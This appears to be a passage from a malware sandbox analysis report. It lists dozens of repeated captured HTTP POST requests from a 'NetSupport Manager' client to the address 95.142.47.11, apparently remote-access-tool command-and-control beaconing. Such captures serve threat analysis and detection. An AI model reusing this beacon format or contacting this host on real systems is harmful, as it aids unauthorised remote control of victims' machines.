                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.521920919 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.622916937 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.723905087 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.823925972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.924912930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.024933100 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.125907898 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.225975037 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.327115059 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.428002119 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.528945923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.629029036 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.730045080 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.831029892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:37.931034088 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.032339096 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.133080006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.234823942 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.336035967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.437056065 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.538052082 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.637950897 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.738910913 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.838891983 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:38.939903021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.039916992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.141002893 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.242036104 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.342940092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.443909883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.543890953 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.644201040 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.744930029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:39.847939968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.053052902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.153964996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.254077911 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.355133057 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.455033064 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.557692051 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.658435106 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.757997036 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.858925104 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:40.959937096 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.060072899 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.161103010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.262777090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.364037991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.463977098 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.564989090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.666045904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.767060995 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.867924929 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:41.968894958 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.068958044 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.169948101 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.270039082 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.370978117 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.470943928 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.570955992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.671911001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.771888971 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:42.873349905 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.076018095 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.177000046 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.283128023 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.383975983 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.485043049 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.585155964 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.685910940 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.787033081 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
